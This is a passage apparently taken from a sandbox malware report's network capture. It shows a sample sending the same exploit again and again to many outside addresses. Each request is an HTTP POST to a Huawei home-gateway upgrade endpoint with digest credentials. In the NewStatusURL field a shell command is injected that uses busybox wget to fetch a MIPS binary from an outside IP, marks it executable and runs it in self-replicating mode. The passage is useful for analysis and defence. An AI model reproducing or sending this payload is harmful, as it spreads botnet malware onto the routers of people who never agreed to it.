                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    57192.168.2.1445078131.142.45.22337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.129630089 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    58192.168.2.1442490157.203.62.24237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.129630089 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    59192.168.2.145102041.196.126.137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.129630089 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    60192.168.2.1454424125.79.62.24437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.130584955 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.550470114 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    61192.168.2.1444874171.128.195.13737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.131676912 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
